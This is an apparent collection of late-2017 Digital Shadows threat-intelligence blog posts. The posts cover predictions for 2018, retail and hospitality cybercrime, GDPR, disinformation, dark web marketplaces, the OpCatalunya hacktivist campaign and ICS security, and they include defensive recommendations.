    • Supply chain and third party attacks have been a common feature in 2017 and will continue to be a fruitful attack method for cybercriminals in the next year. These tend to be highly focused operations with predetermined targets of interest, rather than cases of mass, indiscriminate targeting. Nevertheless, the Oracle MICROS breach that affected its point of sale customers and NotPetya campaign were outliers in this regard. This is probably due to the differing motives of these campaigns: supply chain attacks are often done for intelligence gathering and reconnaissance purposes, whereas thee MICROS and NotPetya attacks were financial or disruptive, so the emphasis would have been on widening the number of targets for maximum effect. Suppliers and third parties are often seen as easier entry points for attackers, especially as many do not have adequate security maturity levels. Moreover, suppliers are often given unnecessary wholesale access to company networks, which is why they are targeted in the first place.
    • Wormable malware – Some of the biggest cyber incidents in 2017 revolved around the issue of self-replicating malware that can spread between networks. WannaCry and NotPetya were examples of this. As well as these we’ve seen the Bad rabbit ransomware that reportedly spreads via a combination of Windows Management Instrumentation (WMI) and Server Message Block (SMB) protocol, and a wormable Trickbot banking trojan was also reported in Jul 2017.

    I expect malware modified with self-replicating capabilities to continue in 2018, particularly given the disruption caused by WannaCry and NotPetya inspiring similar attacks. Another driver for this is that many organizations around the world will be slow to mitigate against these methods, whether by applying appropriate patches and updates, restricting communication between workstations, and disabling features such as SMB to reduce the capability of malware to propagate within organization networks.

    The bar for cyber-attacks keeps getting lower. The availability of leaked tools from the NSA and HackingTeam, coupled with ‘how to’ manuals, means that threat actors will have access to powerful tools that they can iterate from and leverage to aggressively accomplish their goals.

    But whatever happens in 2018 and beyond, what is clear is that cybercrime will continue to be a problem and present governments, businesses and individuals with challenges to protect their data and their intellectual property. It is therefore critical that you take steps to manage your digital footprint and manage the digital risk you present to the World via your business activities in the internet and via cloud solutions. That way, when something bad does happen, you will know quickly and can deal with it more effectively.

    Why I Joined Digital Shadows: Product, Culture and Opportunity Wed, 13 Dec 2017 18:51:02 +0000 Making the decision to join Digital Shadows was actually a relatively straight forward decision for me, as it was impossible to turn down this unique opportunity.  My decision came down to 3 main factors – product, culture, and the opportunity ahead.

    Product and Timing:

    The space we operate in is growing, and maturing, rapidly. While others are concentrating their efforts solely on social media or dark web threats, Digital Shadows SearchLight™ offers unique insight into the risks facing an organization across the broadest range of areas in our industry. This extensive coverage, coupled with our intelligence analyst expertise, allows our clients to gain a full picture of their external digital risk, without false positives, and with mitigation options. This empowers practitioners in a way that was not possible before.

    Culture and People:

    Our Co-Founders, Alastair Paterson and James Chappell, have built a truly exceptional and unique team and culture at Digital Shadows.  The passion and enthusiasm that the whole company has for our SearchLight product and our clients is truly infectious.  Throughout the interview process I was pleasantly surprised at how consistently the vision of Digital Shadows was echoed by those I met.  The passion that the team has to ensure our clients are successful is key to our own success.  That passion, through our analysts that overlay our technology, make us truly unique in the market place.

    The Opportunity Ahead:

    The cyber security and digital risk industry is maturing quickly and we have a great opportunity through the Client Success team to differentiate ourselves from our competitors.  Through our SearchLight product and ability to build lasting trusted advisor relationships with our clients, we can ensure that their digital risks are clearly understood.


    I’m very excited about my next adventure, and look forward to creating a delighted client experience for everyone that chooses to work with us at Digital Shadows.

    A New CISO Looking to See How Deep the Rabbit Hole Goes Tue, 12 Dec 2017 17:10:06 +0000

    Well it is official, I’m now the Chief Information Security Officer here at Digital Shadows. It has been while since I was on the practitioner side of the house and my days defending networks at the University of Texas at Dallas seems like ages ago. When I was at Forrester Research, I often joked about how much easier it was to parachute in, give some industry analyst words of wisdom and then head back to the airport. It is much easier “to say” than “to do.”  The Heartbleeds, WannaCrys, and BadRabbits of the world are going to mean significantly more to me in my practitioner new role. It’s almost as if Morpheus is greeting me with a red pill, welcoming me back to the real-world.

    I’ve worked with many CISOs over the years. From the Forrester Leadership Boards, to our own Customer Advisory Board here at Digital Shadows, I’ve found myself in a position to give out security program suggestions and advice to CISOs. To be honest, I always felt like a bit of an impostor; giving advice to a security and risk leader when I hadn’t been one myself. Sometimes I felt analogous to that one friend without children, who gave out parenting advice on how to get a threenager to eat more vegetables. For those with kids you know exactly what I’m talking about. Why don’t you try walking a mile in my shoes before you give me your #protips.

    I’m grateful for the opportunity and I’m very excited about this new role as it demonstrates Digital Shadows’ commitment to our customers security and privacy. I’m also very appreciative for the CISO network I’ve built up over the years. I will definitely reach out to my new peers for guidance and support on this new path. I also plan to blog more about my journey in the hopes that I can share my personal lessons learned with any other first time CISOs looking for guidance. Stay tuned for more.

    Digital Shadows’ Most Popular Blogs of 2017: Analysis of Competing Hypotheses For The Win Tue, 12 Dec 2017 05:55:06 +0000

    This time last year, we looked back at the blogs that caught our readers’ attention the most. In 2016, it was our Analysis of Competing Hypotheses of the Tesco Bank incident that reached the top of the pile. In 2017, it was yet another ACH that topped the Digital Shadows blog charts.

    1. WannaCry: An Analysis of Competing Hypotheses

    In May, the WannaCry ransomware spread across computer networks across the world. Despite a range of explanations offered, there was a lot of confusion as to the actors behind the campaign and their objective(s).

    Using ACH, our analysts recorded their assumptions, evidence and hypotheses on one matrix. This identified the hypotheses that were least likely to be valid. (In the end, we actually posted an additional, updated ACH as more evidence emerged:

    This structured approach is significant as it facilitates easier collaboration and peer review. Indeed, we were happy to see others getting involved with ACHs, including SANS Internet Storm Center handler who did some excellent additional analysis on this area.

    ACH can’t be used in all circumstances, but the transparency it provides is useful and aligns with the values of intelligence tradecraft that Jim Marchio espoused in his paper ‘Analytic Tradecraft and the Intelligence Community: Enduring Value, Intermittent Emphasis’.

    For those ACH nerds out there, you can view all the ACH’s we’ve done here:

    1. Equifax Breach: The Impact for Enterprises and Consumers

    The was arguably the biggest story of 2017, so it’s only understandable that this blog attracted plenty of readers. When events like this break, it’s always tricky to find the correct balance of a quick response and providing accurate and useful information. We’ve found that transparency helps here and use the following structure:

    1. What we know
    2. What we don’t know
    3. What we expect to happen next

    By taking this approach, we can cut through the hype and identify intelligence gaps. It’s definitely a structure we’ll be using for future breaking events.

    For those interested in lessons we can learn from the Equifax breach, check out this short paper we published:

    1. Innovation in The Underworld: Reducing the Risk of Ripper Fraud

    The final of the top three blogs of 2017 focused on the cybercriminal ecosystem, and the mechanisms criminals have in place to detect fraud from other criminals.

    Those who commit this type of fraud are known as “rippers” and there are several mechanisms in place to protect against them, including and blacklists. One service, called ripper[.]cc is an innovative approach to identifying rippers, demonstrating how professionalized the cybercriminal ecosystem has become. Ripper[.]cc allows users to identify profiles that have been previously reported, and do so across different platforms. There’s even a Chrome plugin to make this even easier. You can read more about ripper[.]cc in this blog:

    Check out these three blogs and keep an eye out for the exciting research we have planned for 2018.

    Meet the New Wed, 29 Nov 2017 05:09:04 +0000 This morning we launched the new Digital Shadows website. Our main goal of creating this new website was to make it a valuable resource to the many security leaders and practitioners, board members, and executives who visit our website each day. We wanted to provide a view on how we are partnering with our customers to protect their company from digital risks across the open, deep, and dark web. These digital risks include cyber threats, data exposure, brand exposure, VIP exposure, infrastructure exposure, physical threats, and third party risk. We wanted to share these customers stories as we find that organizations both large and small, across every industry and geography, are all facing a similar and very hard task. The team here at Digital Shadows is incredibly focused on helping our customers solve these problems every day.

    We hope you enjoy our new website experience. Here are some highlights:

    1. Our new modern interactive home page with significantly more valuable content


    2. A deeper SearchLight portal experience so you can get a feel of how our service can help you monitor, manage, and remediate digital risks
    (Just scroll down on the Home Page)


    3. A more personalized experienced designed for your role, vertical, and company size


    4. A fantastic resource center that houses all of the great content our team has created that we hope is valuable to you

    Risks to Retail: Cybercriminals Sharing the Joy This Holiday Season Tue, 21 Nov 2017 23:41:33 +0000 Despite some early deals, Black Friday officially begins on 24th November, kick-starting over a month of consumer spending over the holiday period. This year, it’s expected that a whopping $862 billion dollars will be spent during this season. A significant chunk of this is online sales, with $116 billion set to be spent. Cybercriminals also look to get a slice of the holiday sales action.

     Cybercrime and the holiday season

    In our recent webinar and whitepaper, we identify cybercrime risks to retailers and consumers:

    1. Payment Systems Risk – How cybercriminals acquire payment card information, through Point of Sale (POS) malware and skimming.
    2. Fraudulent Transactions – The monetization of this payment card information, through Card Not Present (CNP) fraud and eGift cards.
    3. Account Takeover – Fraudsters that look to log in to consumers accounts, be that the retailers or payment platforms. Phishing and credential stuffing are prime techniques for this.
    4. Loss of Service – With so much money spent online, the threat of Distributed Denial of Service (DDoS) is a real threat to retailers. Cybercriminals know this and look to extort companies.

    Amid all of these risks, criminals look to help each other out. For example, in one instance, one actor on shared templates for phishing pages (Figure 1) in a criminal forum. This scam page is well made and has some interesting functionality, including the ability for victims to authenticate with ID cards and passport photos and auto-redirecting victims to the legitimate site.  With this template available for free, actors need only register a convincing-looking domain.

    scampage advertisement

    Figure 1: An advertisement for a phishing “scampage” on a criminal forum.

     ID upload feature screenshot

    Figure 2: A screenshot of the ID upload feature from a demonstration video, which allows attackers to harvest additional information.

    Fraudsters also share software. In Figure 3 we see the AntiDetect tool, which any carder worth their salt will be using. Carders know that retailers use device fingerprinting to detect fraudulent transactions, so the ability rotate and quickly change system components like browser type, version, language, time zone, and user agent. You can read more about this particular tool in an article by Brian Krebs.


    AntiDetect tool

    Figure 3: The AntiDetect tool to overcome browser fingerprinting controls.

     Of course, there are criminals that look to exploit this interest in tool-sharing by disguising malware as carding tools. Figure 4 is an example of an actor claiming to share such tools – in this case a PayPal email checker. Unsuspecting downloaders may get more than they bargained for when downloading this .exe file. It’s a cliché, I know, but there’s no honor amongst thieves.


    Criminal forum example

    Figure 4: A tool to “check email paypal” available for download and advertised on criminal forums.

    Nevertheless, with criminals so open to sharing so many tools and tactics, it’s a reminder to organizations to do the same; make use of sharing communities such as R-CISC and Infraguard to stay abreast of these latest criminal approaches.


    You can watch our webinar or download our latest whitepaper to learn more about these tactics and tools, as well as tips for retailers and consumers to follow in order to mitigate these risks.

    GDPR – Not Just a European Concern Mon, 20 Nov 2017 23:37:13 +0000

    This post originally appeared on SecurityWeek.

    Europe Data Privacy

    The recent Equifax breach that has been all over the news raises an interesting question: How would the situation have played out if it was after May 25, 2018 when the new General Data Protection Regulations (GDPR) are due to come into force? While none of us has a crystal ball, we can bet the outcome for Equifax would be even worse.

    This report provides comprehensive information on the GDPR but, in brief, the GDPR is a new set of regulations to protect the personal data and privacy of citizens of EU countries. It will affect any company that processes personal data of EU citizens – even if that company doesn’t have a presence in an EU country – making this legislation more than a European concern. To begin with, the regulations set a high standard for the speed with which businesses are required to report data breaches, in some cases within 72 hours after becoming aware of the breach. Companies also have to comply with each of these rights, transparently and without cost to EU citizens:

    • Right of data portability – if a customer asks for their data you are required to provide it
    • Right of removal – if a customer requests that their information be removed from your systems you are required to do so
    • Data transfer notification – prior to sharing customer data with a third party, you must notify the customer and gain explicit consent to share it
    • Customer access requests – if a customer asks whether or not you hold data on them, you are obligated to let them know

    To satisfy the GDPR regulations, companies will likely need additional processes, technology and personnel in place. In a survey by PwC of U.S. companies, nearly 70% of respondents said they plan to spend between $1 million and $10 million to address GDPR obligations. While that may sound like a lot, it could pale in comparison to fines. Failure to comply with the GDPR can result in hefty financial penalties of up to 4 percent of global turnover or 20 million Euros (more than $23 million), whichever is greater in certain instances. For companies operating with razor-thin margins, profits could easily evaporate into thin air.

    The need to comply with data privacy regulations is nothing new to U.S.-based companies. In fact certain states like California and Delaware have particularly strict rules around online data privacy. Further, the U.S. Department of Commerce has worked for some time to synchronize privacy legislation between the U.S. and the U.K. so that trade (mostly online) can be conducted successfully in the joint interest of both groups. This led to the creation of the EU-U.S. Privacy Shield Framework designed to give concurrency to protection, meaning the same level of protection for EU citizens whether in the EU or the United States.  Companies based in the U.S. can self-certify that they provide “adequate” privacy protection and then must comply with the Framework’s requirements.

    GDPR continues some of the core principles set out by this earlier legislation which helps ease the transition for companies that have maintained compliance. But differences including the 72-hour reporting deadline, exactly how ‘personal information’ is defined and the broader rights granted to EU citizens must be considered. So what can U.S.-based companies do to prepare for the GDPR? These five steps can help:

    1. Understand what data you have and where it is. Make sure you understand what data you hold on EU citizens.  If you don’t hold data on EU citizens then you need not concern yourself with the GDPR, but given the global nature of business this is unlikely to be the case. If you do hold EU citizen data then consider this: every company has a certain amount of data loss, yet many aren’t aware that they’ve already been breached. If you don’t already do so, proactively monitor sites on the open, deep and dark web for your customers’ information. Understanding any data leaks and addressing them now will give you a clean start when the GDPR goes into effect next year.
    2. Engage in supply chain security. Most businesses have a long supply chain. For example, it isn’t unusual for a Tier 1 financial institution to have 15,000 suppliers/partners who quite often hold proprietary information on the institution’s customers. Under the GDPR, both data controllers and data processors have protection and privacy obligations to EU citizens. Make sure your company’s security guidelines and controls with suppliers are adequate and that your suppliers are in compliance and following best practices.
    3. Complete the EU-U.S. Privacy Shield self-certification process. It is still unclear whether or not the EU-U.S. Privacy Shield Framework will continue. However, companies that are self-certified when the GDPR goes into effect can demonstrate a commitment to protecting the data and privacy of EU citizens. This puts you further down the path of compliance with the GDPR and on more solid footing to continue business with EU companies and citizens during the transition.
    4. Establish GDPR compliance processes now. You need to establish and test processes in advance to ensure you know how and who to notify in the event of a breach. With only 72 hours to spare, you can’t afford to wait and figure it out ‘on the fly.’ Additionally, make sure you have identified processes to support all the other rights of EU citizens under the GDPR including data portability, removal, transfer notifications and access requests. Consider appointing a data protection officer to oversee these efforts.
    5. Seek legal counsel. All of these changes require considerable thought, time and effort. Before you go too far down the path of implementing processes and any supporting technologies required, seek professional legal advice to ensure that your chosen approaches suitably address the legislation.

    Crystal ball or not, it’s clear that the GDPR is not just a European concern. What’s not yet clear is how quickly or severely the Information Commissioners Office will treat non-compliances in the early part of the legislation. Regardless, given the scope of requirements, affected U.S.-based companies should start to prepare now to mitigate risk.

    Fake News is More Than a Political Battlecry Thu, 16 Nov 2017 23:25:03 +0000 This week, British Prime Minister Theresa May came out and attacked Russia’s attempt to “weaponize information” in hostile actions against western states. This comes on the back of a wave of news that’s covered “fake news” and the U.S. elections. At the latest count, Russia-linked Facebook posts reached 126 million users during the U.S. election period. This makes great headlines and fascinating reading, but what does it all mean?

    We must remember that the use of social media bots is nothing new. Nor is influencing elections; using social media to influence the outcomes of elections isn’t event particularly new.

    Our latest paper covers four areas:

    1. Disinformation is different than fake news;
    2. Disinformation campaigns have financial motivations too;
    3. There are a wide range of tools available, which extend beyond social media;
    4. Understanding these motivations and tools allows us to look disrupt disinformation campaigns.

    Disinformation Whitepaper


    Let’s get a boring, semantic (yet important) clarification out of the way. Fake news and disinformation are different, albeit related, terms. The confusion between the two terms holds us back from having a sensible conversation.

    Fake news refers to all manner of things, including disinformation campaigns, partisanship, and honest journalist errors. Disinformation campaigns are specifically those that deliberately spread false information in order to deceive their target or audience.

    One of the greatest quotes on this comes from the former Director of Department X for the East German foreign intelligence: “Our friends in Moscow call it ‘dezinformatsiya’. Our enemies in America call it ‘active measures,’ and I, dear friends, call it ‘my favorite pastime.’”

    This need not be limited to the geopolitical sphere, it can apply to ideological and financial motivations too.


    It would be wrong to assume that the sole target of disinformation campaigns is the electorate and political parties. Given how easy it is to access and wield these online tools, organizations can easily be slandered and their share prices can change. We’ve seen such activities already, particularly surrounding BioTech companies and accusations about the role of Martin Shkreli and an online actor named Art Doyle.

    Actors might not even need to get into the weeds of these tools. TheInsider is a dark web “Pump and dump” service that encourages users to invest in their scheme. The scheme itself looks to manipulate interest in cryptocurrencies to pump up the price and sell shares for profit.


    Disinformation TheInsider

    Regardless of the motivation behind disinformation campaigns, these do not happen in isolation. Instead, malicious actors take advantage of a wide range of tools available at a very lower barrier to entry.


    Digital Shadows’ Disinformation Campaign Taxonomy is based on a three-stage attack chain (creation, publication, and circulation), which includes an overview of the methods, tactics and tools associated with running such an operation.

    Taxonomy of Disinformation

    By using Digital Shadows’ Disinformation Campaign Taxonomy, we can see that there are different stages that defenders can target to help disrupt disinformation campaigns in their infancy. Early identification of these campaigns is critical to increase the likelihood of successful disruption.

    Download a copy of our latest research report, The Business of Disinformation: A Taxonomy, to see tools actors can turn to when waging disinformation campaigns and what it means for organizations in the next year.

    Why “Have a Safe Trip” Is Taking On Greater Meaning Tue, 14 Nov 2017 23:19:04 +0000 This post originally appeared on SecurityWeek.

    Have a safe trip! Typically, when we wish someone well before they leave on a journey we are referring to their physical safety while in transit. But, increasingly, there’s another consideration – their online security.

    Over the past year, compromises of payment card data from Point-of-Sale (POS) systems, network intrusions against third-party suppliers, and cyber espionage campaigns against visitors using hotel Wi-Fi networks have plagued the travel and hospitality industries. In the spirit of “forewarned is forearmed,” let’s take a closer look at some of the most notable examples of each of these types of threats and how firms in these industries can mitigate risk.

    POS attacks:

    Financially-motivated actors seeking to compromise payment card details use malware to extract this data from POS systems or devices as well as physical skimming devices. Based on the 20 POS malware variants that have been documented and numerous reports of breaches, the travel and hospitality industries have been under siege. In the last six months alone a new variant, MajikPOS, and modifications to the RawPOS variant and the Zeus banking trojan targeting POS systems, have emerged. Since August 2016, POS attacks have reportedly affected 37 Best American Hospitality Corporation restaurants, 62 Kimpton hotel locations and an unknown number of Chipotle Mexican Grill locations. Threat actors focused on these industries include FIN7, TA530 and Vendetta Brothers who each use a range of tactics, techniques and procedures (TTPs). As an example, the threat group FIN7 targets the hospitality industry through the following TTPs:

    • Spearphishing emails containing malicious Microsoft Office documents
    • Social engineering methods to ensure targets open an attachment and initiate the infection process
    • Macro-enabled documents that download initial backdoor payloads onto recipient machines to allow for continued access to systems
    • Malware to move laterally through compromised networks

    Network intrusions:

    The most high-profile network intrusion in the past year involved a compromise of the Sabre Corporation, reportedly affecting at least eight hospitality companies. Through unknown means, the attackers had accessed account credentials that permitted access to payment card data and information for some reservations processed by Sabre’s central reservation system. The company stated that not all compromised records included CVV numbers, and no personal information, such as social security numbers, passport numbers, or driver’s license numbers were accessed. This attack demonstrates a trend of third-party supplier attacks in which financially-motivated actors impact multiple companies by compromising their supplier to access sensitive or valuable data.

    Wi-Fi network compromise:

    Threat actors have also targeted hotel Wi-Fi networks in an information gathering and cyber espionage campaign against travelers to Europe and the Middle East. Threat actors almost certainly choose to target these networks because they are deemed less secure and can be leveraged to perform additional actions, such as stealing credentials and moving laterally within networks. In this particular campaign, spearphishing emails were used to deliver information-harvesting malware to victims. The attackers also purportedly used the EternalBlue exploit, which targets the vulnerable Microsoft Server Message Block (SMB) protocol for lateral movement within target networks.

    So what can you do to mitigate risk?

    Layer security:

    • While the Europay, Mastercard and Visa (EMV) chip technology has made physical card fraud more difficult, online card spending is on the rise. Consider using 3D Secure as an additional layer of security which has proven to be a real obstacle for criminals and is deployed by Visa and Mastercard.
    • To prevent lateral movement once inside the network, restricting workstation-to-workstation communication by using host-based firewall rules is also encouraged where feasible.
    • Implement an enterprise password management solution – not only for secure storage and sharing but also strong password creation and diversity to mitigate the risk of credential compromise.


    • With the help of Google Alerts or open source web crawlers like Scrapy, monitor for mentions of your company on cardable websites (sites that track those that are susceptible to fraudulent purchases as a result of lax security controls).
    • Monitor for mentions of suppliers’ names on the open, deep and dark web to help identify if key partners are being targeted by threat actors and if such activity may put your organization at risk.
    • Proactively monitor for credential dumps relevant to your organization’s accounts.


    • Routinely train employees about the risks of spam and spearphishing and how to avoid becoming a victim.
    • Because employees often reuse corporate credentials for personal use, establish and communicate policies that restrict which external services are allowed to be associated to corporate email accounts. Encourage staff to use consumer password management tools like 1Password or LastPass to also manage personal account credentials.

    Address vulnerabilities:

    • Patching is an important part of your defense strategy and failing to do so opens the door wide for adversaries. For example, Microsoft has issued a patch for the vulnerabilities exploited by EternalBlue. Application of these patches prevents the exploitation of the SMB network service.
    • Proper configuration is also critical. In the case of the SMB service, TCP port 445 should not be reachable from the public Internet; where external access to SMB is required, a VPN or IP address whitelisting should be used to restrict access. SMB traffic should, ideally, not be permitted to egress from an organization’s network to the public Internet.

    As long as payment card details and other proprietary information remain lucrative on criminal forums and marketplaces, the travel and hospitality industry need to remain vigilant. But with greater awareness about POS system attacks, operations against third-party suppliers, and the vulnerabilities of public or semi-public Wi-Fi networks, companies can do a lot to mitigate risk and ensure safer journeys for travelers.

    Know Where to Find Your Digital Risk Fri, 10 Nov 2017 22:12:23 +0000 This post originally appeared on SecurityWeek. Read more from CEO Alastair Paterson.

    Approximately 250 years ago Samuel Johnson said, “The next best thing to knowing something, is knowing where to find it.” This is quite a fitting quote from the author of A Dictionary of the English Language and equally fitting today when it comes to understanding your digital risk.

    There’s a great deal of intelligence organizations can find on the deep and dark web.  Credit card numbers, bank account information, patient information and intellectual property are widely known to be for sale on forums. Now some of the intelligence is more eye opening. We’re seeing W-2 forms , and employee credentials available, making any organization ripe for tax fraud or account takeover, respectively.

    One of the most popular marketplaces on the dark web for such information is AlphaBay. Not only is information related to a company’s assets available, but information about new techniques to compromise targets is for sale as well. One of the latest is a tool to bypass SMS account verification, making multi-factor authentication that relies on SMS vulnerable.  On such forums you can also find configuration files for credential stuffing tools, like Sentry MBA, that are created for account takeover of specific companies. There are dozens of marketplaces on the dark web and competition for business is steep. In fact, some less popular marketplaces offer botnets devised to spam AlphaBay users with advertisements or special promotions in an attempt to entice them to switch forums. Not all dark web sources are as readily accessible as AlphaBay, of course. Some require human analyst expertise to also gain access to closed sources to get the most relevant view of the risks.

    But for all the notoriety of these marketplaces, it is also important to remember that criminal activity isn’t limited to the dark web, particularly given the fact that some countries don’t extradite cybercriminals. With minimal consequences, bad actors have no incentive to hide. As a result, cybercrime is an Internet-wide problem, almost equally present on the deep and open web. is a prime example. This all-in-one outsourced online shop provides hosting, design (based on WordPress-like templates) and a payment solution. Additional items for sale on the marketplace include:

    • Bot-registered social media accounts (usually sold in bulk), typically with the intent of supporting social media spam and artificially increasing the popularity of other accounts/posts
    • Stolen, legitimate social media accounts, which are advertised in small quantity but at higher prices compared to bot-registered accounts
    • “Coupons” to services that artificially increase the popularity of social media accounts or posts
    • Stolen accounts from other services including banks, payment, and gift and loyalty cards
    • Dedicated servers and domain names

    The point is that criminal forums exist everywhere so focusing only on the dark web won’t give you a comprehensive view of your digital risk. Furthermore, it isn’t enough to simply detect mentions of company assets and concerns. You need context behind the information you see posted to have a better understanding of the actual risk to your organization. This requires a combination of technology and people.

    • Automated collection technology can provide visibility into incidents with context, as they happen, wherever they happen – across the open, deep and dark web. For example, being able to see previous posts by other users on the marketplace on the same thread or post can provide a deeper understanding of how your company, employees or customers may be impacted. It can also provide an overview of the user in question, with their name, data joined, activity levels and reputation.
    • Data scientists and intelligence experts are able to gain access to some closed sources that collection technology alone can’t penetrate and they need to be involved in qualifying the data collected. With enhanced analytic capabilities and additional context they can help determine the potential impact to the organization, a possible timeline of events, and recommended action.

    A comprehensive assessment of your digital risk starts with knowing where to find it. With an approach that combines technology and human experts looking across the open, deep and dark web, you can understand not only where and when you are mentioned online, but also why, by whom and the likely impact to your organization. This breadth and depth of coverage is essential to protect against threats associated with forums and marketplaces and, ultimately, to formulate a successful digital risk management strategy.

    Pwnage to Catalonia: Five Things We Know About OpCatalunya Thu, 02 Nov 2017 21:00:08 +0000 Since October 24th, Digital Shadows has observed an increase in attack claims and social media activity associated with the OpCatalunya (OpCatalonia) hacktivist campaign. Given the ongoing tensions between Catalonia and Madrid, we expect online activity to continue for the next few weeks at least. Here are five things all organizations with operations in Spain need to know about the campaign:

    1. What is OpCatalunya?

    OpCatalunya was established in late September 2017 by affiliates of the Anonymous collective in response to ongoing political and social tensions between the Catalonian autonomous community and Spain’s Madrid government. Catalonia held an independence referendum on October 1st that was subsequently declared “illegal” by the Spanish government. Although we observed a small number of references to the hashtag OpCatalunya on social media before late September, these were not related to the incumbent hacktivist campaign of the same name and instead pertained to long-running tensions between the region and central government, which dates back to the nineteenth century.

    2. Who is Involved? 

    Although the campaign is most closely associated with the Anonymous collective, particularly its Spanish iteration (Anonymous Spain), other hacktivist actors and groups, including Shadow Sec team, Team Poison, F Security and other branches of the Anonymous collective such as Anonymous France, Anonymous Albania, Anonymous Belgium and Anonymous Germany have either taken part of pledged their support.

    3. What Activity Have We Seen?

    The campaign initially called for attacks against Madrid-based government and law enforcement websites; however, there has been a widening of targeting to include education, media, and financial services organizations across Spain. As well as several denial of service (DoS) and data leak attacks against Madrid government sites, Anonymous Spain made DoS attack claims against the Spanish royal family’s website and that of Real Madrid Club de Fútbol, the latter due to its historic ties to the royal family and former Francoist regime. Other supporters of the campaign called for attacks against media companies perceived as providing partisan and anti-Catalan reporting, including El Mundo, Marca, El Pais, Pris and Grupo Planeta. Organizations that do not primarily operate out of Madrid have also been targeted; we detected DoS attack claims made against Banca March, a Spanish bank headquartered in Palma de Mallorca. There were also data exposure attacks conducted against websites belonging to the University of Malaga and Federation of Canary Islands, as well as a defacement of the Faculty of Sciences at the University of Cordoba website.

    Given the political and nationalist motives of this campaign, social media activity for OpCatalunya was strongly influenced by developments on the ground. The rise in attack claims in the second half of October 2017 occurred alongside a surge in social media mentions of OpCatalunya and its associated hashtags. Social media mentions grew dramatically following an announcement on October 19th by the Madrid central government that direct rule would be imposed on Catalonia.

    OpCataluyna 3

    OpCatalunya Twitter activity for Oct 2017

    4. Am I At Risk?

    As targeting for this campaign had expanded beyond government and law enforcement, we assess that all Spanish organizations principally operating out of Madrid are at increased risk of attack. Moreover, OpCatalunya supporters are often opportunistic and not necessarily focused on organizations ostensibly aligned to the central state. Therefore, all organizations with Spanish operations are likely seen as potential targets, though the success of such attacks would often rely on the security posture of these organizations, with attackers typically conducting data exposure attacks and website defacements against low hanging fruit.

    Although very few foreign companies have been targeted thus far, attackers may eventually move towards high-profile internationally recognized targets operating in Spain as a means of further publicizing their cause, particularly given the current impasse over Catalonian independence. The threat to foreign companies would also increase if they were perceived to have close affiliations with Madrid authorities – for example by publicly denouncing the Catalonian right to self-determination, displaying positive sentiment to the actions of central government, or threatening to move business operations out of Barcelona.

    Despite displaying high levels of intent, the capability of OpCatalunya participants is typical of most hacktivist campaigns, primarily consisting of relatively unsophisticated data exposure attacks (likely conducted via SQL injection techniques that are popular among hacktivists), website defacements and DoS attacks. Therefore, the capability of OpCatalunya participants is assessed as low to moderate at the time of writing.

    5. What Else Can We Expect?

    OpCatalonia supporters have explicitly expressed their desire to conduct further attacks, namely a DoS attack against Spanish Internet infrastructure on November 12th. While no further information was provided by the OpCatalonia Twitter account, Internet service providers (ISPs) operating in Spain would be the most probable targets.

    OpCataluyna 2

     OpCatalonia Twitter announcement

    OpCatalunya has already garnered the support of other participants from the wider Anonymous collective and beyond. We may see additional groups lend their support to the campaign, either out of solidarity for nationalist independence movements or to further their own cause. Forbes published an article on October 16th that claimed the Russian state was actively supporting Catalonian independence to sway public opinion in favor of its annexation of Crimea in 2014, which Russia maintains was a legitimate independence movement from Ukraine. While we detected no indication that Russia or other nation state actors had attempted to influence the Catalonian independence campaign through cyber activity, the prospect of this occurring in future was a realistic possibility.

    Digital Shadows has put in place a dedicated monitoring capability for this campaign. We will update accordingly should there be any significant change in targeting or increase in activity.

    ICS Security: Strawmen In the Power Station Tue, 31 Oct 2017 20:53:56 +0000 Congrats, it is now almost November and we have nearly made it through Cyber Security Awareness month (and what a month it has been). The theme for this final week is: “Protecting Critical Infrastructure from Cyber Threats.”

    For the purposes of this blog, I want to discuss two strawmen views of Industrial Control Systems (ICS) Security which, unfortunately, are both prevalent in many discussions around the topic of critical infrastructure protection:

    1. Doom’n’Gloomers: this is the “sky is falling” view of ICS security, often from people with an IT security background, who are appalled by lack of patches, outdated Operating Systems and lack of traditional IT security controls
    2. Airgappers: this is the view that ICS security is in a good place due to the airgapped nature of ICS systems and the lack of understanding of attackers of the complexities of ICS systems

    My opinion is that both views are partially accurate and that the reality of ICS security is nuanced and appreciation of that nuance is essential for making security decisions about those systems.

    A recent study claims that “One third of OT [Operational Technology] networks are exposed to cyber attacks” mainly due to the ICS systems having some form of internet connectivity, usage of unpatched or unpatchable systems and lack of encryption for passwords. These are all valid concerns. Which strawman argument is right, Doom’n’Gloomers or Airgappers? There are arguments on both sides:

    1. Almost all systems require some degree of internet connectivity in the modern era. While airgaps sound desirable due to their strong security properties, there are serious challenges to their usage: they cannot be updated, the data they collect cannot be exported and they cannot be remotely debugged in case of an issue. In a statement before the Subcommittee on National Security, Homeland Defense, and Foreign Operations in 2011 Sean McGurk, the Director of the Control Systems Security Program, stated that: “In our experience in conducting hundreds of vulnerability assessments in the private sector, in no case have we ever found the operations network, the SCADA system or energy management system separated from the enterprise network.” Despite the absence of complete airgaps, ICS networks are often firewalled or segmented off from the main enterprise network. Frameworks like NIST 800-82r2 and centers like CPNI (Critical Protection of National Infrastructure) have guidance around the deployment of firewalls for ICS systems, for example. We hope this guidance is followed.

    2. The continuing use of Windows XP past it’s End of Life is a concern due to any new security vulnerabilities which are discovered are not being patched. Even though Microsoft issued an emergency patch for the ETERNALBLUE exploit (MS17-010), its deployment in ICS systems is likely not widespread due to the difficulties involved with patching systems where Availability is the key concern. These systems do have vulnerabilities. But the ease of exploitation of these vulnerabilities is not as often discussed. ICS systems often have physical security controls, for example, only accessible from rooms which have physical access control and closed-circuit television (CCTV.) Unfortunately, many support contracts do not allow companies to upgrade or modify software without vendor approval, thereby extending the time required to patch.

    3. Legacy equipment which is incapable of encrypting passwords or the misconfiguration of equipment which is capable is certainly an issue. However, as mentioned previously, access to control networks is not as straightforward as access to enterprise network for an attacker. While there are some ICS systems which are connected to the Internet, it is rare to find the Human-Machine Interface (HMI) for a power station easily accessible. Often, they are connected to other systems via leased lines or a VPN. Additionally, the knowledge and skills to compromise an ICS system itself, rather than its surrounding IT infrastructure, are rare. Robert M. Lee and others helpfully distinguish intrusions into ICS system into two steps: Step One: Network Access and Step Two: Operation Access. Compromise of the enterprise network would be Step One. The access to the operational networks, Step Two, and then being able to use that access has been publicly documented in only two cases: Stuxnet and BlackEnergy/CRASHOVERRIDE. While such attacks are a concern, they are far from an everyday occurrence.

